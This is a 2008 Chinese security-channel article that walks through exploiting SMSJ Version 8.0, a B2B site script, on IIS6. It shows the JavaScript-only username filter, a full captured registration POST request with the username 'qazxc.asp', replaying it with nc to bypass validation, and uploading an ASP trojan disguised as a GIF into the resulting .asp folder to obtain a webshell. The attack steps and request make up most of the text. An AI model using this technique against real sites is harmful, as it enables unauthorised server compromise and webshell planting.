最新SMSJ Version 8.0漏洞

ZDNet 安全频道频道 更新时间:2008-06-13 作者: 来源:SohuIT

本文关键词:asp Version SMSJ

  帮朋友检测网站的安全性,用的是SMSJ Version 8.0,号称仿阿里巴巴的东西,注册企业会员后,登录管理,发现上传图片会归类到一个http://www.rover.com/UserDocument/你注册的会员帐号/picture/的目录里不由让人浮想联翩,想起早期动易的那个注册漏洞



  说起这个漏洞,完全是iis6引起的,在iis6的站点上,建立一个xx.asp的文件夹,然后在里面放一个改成gif后缀的asp木马,照样会按asp来执行,看了下服务器,八成是win2003,也就是iis6了然后我试着注册rover.asp的用户,注册那里到是过滤了特殊字符的,但是看了下,只是用简单的javascript限制的



  代码如下:



  function checkdata() {



  if( isNumberString(addform.user.value,"1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_")!=1 || addform.user.value.length<2 || addform.user.value.length>16) {



  alert("用户注册出错,下面是产生错误的可能原因:n ·用户名必须是2-16位的数字、英文或下划线")



  return false;



  ok,抓包,然后用nc提交,直接绕过



  抓包内容



  POST /reg_save.asp HTTP/1.1



  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,



  application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*



  Referer: http://www.rover.com/reg.asp?action=reg



  Accept-Language: zh-cn



  Content-Type: application/x-www-form-urlencoded



  UA-CPU: x86



  Accept-Encoding: gzip, deflate



  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;



  .NET CLR 2.0.50727)



  Host: www.rover.com



  Content-Length: 230



  Connection: Keep-Alive



  Cache-Control: no-cache



  Cookie: ASPSESSIONIDASQCACRB=FELPBKLAJDFPOKOPFBDEKGMB; cnzz02=1; rtime=0;



  ltime=1206546036500; cnzz_eid=96831333-



  user=qazxc.asp&pass=1234567&pass1=1234567&ypxxone_id=8&ypxxtwo_id=136&coname=rover&colxr=a



  dmin&colxrsex=%CF%C8%C9%FA&addone_id=17&addtwo_id=490&coaddress=xxxxx&cotelq=010&cotel=384



  76564&mail=icerover@msn.com&vip=3&img.x=58&img.y=17



  nc ip 80成功注册,然后把asp木马改成gif后缀,当图片上传上去



  http://www.rover.com/UserDocument/qazxc.asp/Picture/20080326.gif



  自此得到webshell,over~最近懒的说话,懒得修饰文笔,看不懂的就一直跳过跳过...



  ps:漏洞很简单,好久不写字了,纯粹憋字而已,见笑了,此外,还可以本地提交注册

安全频道 asp 最新报道

安全频道 Version 最新报道

安全频道 SMSJ 最新报道

[an error occurred while processing this directive]